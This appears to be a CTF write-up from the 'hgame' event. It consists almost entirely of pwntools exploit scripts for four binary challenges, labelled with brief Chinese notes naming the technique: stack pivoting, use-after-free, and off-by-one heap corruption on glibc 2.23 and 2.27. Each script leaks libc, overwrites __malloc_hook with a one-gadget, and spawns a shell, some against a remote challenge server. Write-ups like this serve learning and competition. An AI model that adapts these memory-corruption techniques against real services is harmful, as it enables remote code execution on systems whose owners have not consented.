hgame

blackgive

栈迁移

from pwn import*
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
#p = process('./blackgive')
p  =remote('182.92.108.71',30459)
elf = ELF('./blackgive')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
temp = 0x6010A0
leave_ret = 0x4007A3
prdi = 0x400813
main = 0x40070A
#gdb.attach(p,'b *'+str(leave_ret))
password = 'paSsw0rd'.ljust(0x20,'\x00')+p64(temp+0xa0)+p64(leave_ret)
p.sendafter(':',password)
payload = '\x00'*0xa0+p64(0)+p64(prdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.sendafter('!\n',payload)
libcbase = u64(p.recv(6)+'\x00\x00') - libc.sym['puts']
system = libcbase + libc.sym['system']
one = libcbase + 0x4f3d5

pr('libcbase',libcbase)
password = '0'.ljust(0x20,'\x00')+p64(temp+0xa0)+p64(one)
p.sendafter(':',password)
p.interactive()

todolist

UAF glibc2.27

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30411)
#p = process('./todolist')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length):
	p.sendlineafter('exit\n','1')
	p.sendlineafter('write?\n',str(length))
def delete(idx):
	p.sendlineafter('exit\n','2')
	p.sendlineafter('?\n',str(idx))
def change(idx,length,ct):
	p.sendlineafter('exit\n','3')
	p.sendlineafter('?\n',str(idx))
	p.sendlineafter('write?\n',str(length))
	p.sendline(ct)
def show(idx):
	p.sendlineafter('exit\n','4')
	p.sendlineafter('check?\n',str(idx))
add(0x500)
add(0x10)
delete(0)
show(0)
leak = u64(p.recv(6)+'\x00'*2)
libcbase = leak - (0x7f3490493ca0-0x7f34900a8000)
realloc_hook = libcbase +libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
free_hook = libcbase + libc.sym['__free_hook']
one = libcbase + 0x10a41c
pr('libcbase',libcbase)
pr('malloc_hook',malloc_hook)
pr('realloc_hook',realloc_hook)
delete(1)
change(1,0x10,p64(malloc_hook-8))
add(0x10)
add(0x10)
change(3,16,p64(one)+p64(realloc_hook+6))
add(0x10)
#gdb.attach(p,'b *'+str(one))
p.interactive()

todolist2

glibc2.27 off-by-one

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30521)
#p = process('./todolist2')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length):
	p.sendlineafter('exit\n','1')
	p.sendlineafter('write?\n',str(length))
def delete(idx):
	p.sendlineafter('exit\n','2')
	p.sendlineafter('?\n',str(idx))
def change(idx,length,ct):
	p.sendlineafter('exit\n','3')
	p.sendlineafter('?\n',str(idx))
	p.sendlineafter('write?\n',str(length))
	p.sendline(ct)
def show(idx):
	p.sendlineafter('exit\n','4')
	p.sendlineafter('check?\n',str(idx))
add(0x10) #0
change(0,-1,'\x00'*0x18+p64(0xd91))
add(0xff0) #1
add(0x10) #2
show(2)
libcbase = u64(p.recv(8)) - (0x7f2ada7b92a0-0x7f2ada3cd000)
realloc_hook = libcbase +libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
one = libcbase + onegadget[2]
pr('libcbase',libcbase)
add(0x10) #3
add(0x10) #4
delete(4)
change(3,-1,'\x00'*0x18+p64(0x21)+p64(malloc_hook-8))
add(0x10) #5
add(0x10) #6
change(6,-1,p64(one)+p64(realloc_hook+6))
add(0x20)
#gdb.attach(p)
#gdb.attach(p,'b *'+str(one))
p.interactive()

Library management System

off-by-one

远程才发现是glibc2.23

那就glibc2.23和glibc2.27都来一遍吧

glibc2.23

from pwn import*
context.log_level = 'debug'
p = remote('182.92.108.71',30431)
#p = process('./library')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
onegadget = [0x45226,0x4527a,0xf0364,0xf1207]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length,ct='a\n'):
	p.sendlineafter('choice: ','1')
	p.sendlineafter('title: ',str(length))
	p.sendafter('title: ',ct)
def delete(idx):
	p.sendlineafter('choice: ','2')
	p.sendlineafter('id: ',str(idx))
def show(idx):
	p.sendlineafter('choice: ','3')
	p.sendlineafter('id: ',str(idx))
add(0x10) #0
add(0x20) #1
add(0x60) #2
add(0x10) #3
delete(0)
add(0x18,'a'*0x18+'\xa1') #0
delete(1)
add(0x20,'b'*8+'\n')#1
show(1)
p.recvuntil('b'*8)
libcbase = u64(p.recv(6)+'\x00\x00') - (0x7fe8a559fc08-0x7fe8a51db000)
realloc = libcbase + libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
pr('libcbase',libcbase)
pr('malloc_hook',malloc_hook)
one = libcbase + onegadget[1]
add(0x60) #4
add(0x60) #5
delete(2)
delete(5)
delete(4)
add(0x60,p64(malloc_hook-0x23)+'\n') #2
add(0x60)
add(0x60)
add(0x60,'\x00'*(0x13-8)+p64(one)+p64(realloc+12)+'\n')
p.sendlineafter('choice: ','1')
p.sendlineafter('title: ',str(0x10))
#gdb.attach(p)
#gdb.attach(p,'b *'+str(one))
p.interactive()

glibc2.27

from pwn import*
context.log_level = 'debug'
#p = remote('182.92.108.71',30431)
p = process('./library')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(length,ct='a\n'):
	p.sendlineafter('choice: ','1')
	p.sendlineafter('title: ',str(length))
	p.sendafter('title: ',ct)
def delete(idx):
	p.sendlineafter('choice: ','2')
	p.sendlineafter('id: ',str(idx))
def show(idx):
	p.sendlineafter('choice: ','3')
	p.sendlineafter('id: ',str(idx))
add(0x10) #0
add(0x20) #1
add(0x30) #2
for i in range(10):
	add(0x70) #3~12
add(0x70) #13
delete(0)
add(0x18,'\x00'*0x18+'\x71') #0
delete(1)
add(0x60,'\x00'*0x28+p64(0x541)+'\n') #1
delete(2)
add(0x30,'b'*8+'\n') #2
show(2)
p.recvuntil('b'*8)
libcbase = u64(p.recv(6)+'\x00\x00') - (0x7fb7c99030e0-0x7fb7c9517000)
realloc = libcbase + libc.sym['__libc_realloc']
malloc_hook = libcbase + libc.sym['__malloc_hook']
pr('libcbase',libcbase)
pr('malloc_hook',malloc_hook)
one = libcbase + onegadget[2]
delete(2)
delete(1)
add(0x60,'\x00'*0x28+p64(0x41)+p64(malloc_hook-8)+'\n') #1
add(0x30)
add(0x30,p64(one)+p64(realloc+6)+'\n')
#gdb.attach(p)
p.sendlineafter('choice: ','1')
p.sendlineafter('title: ',str(0x10))
#gdb.attach(p,'b *'+str(one))
p.interactive()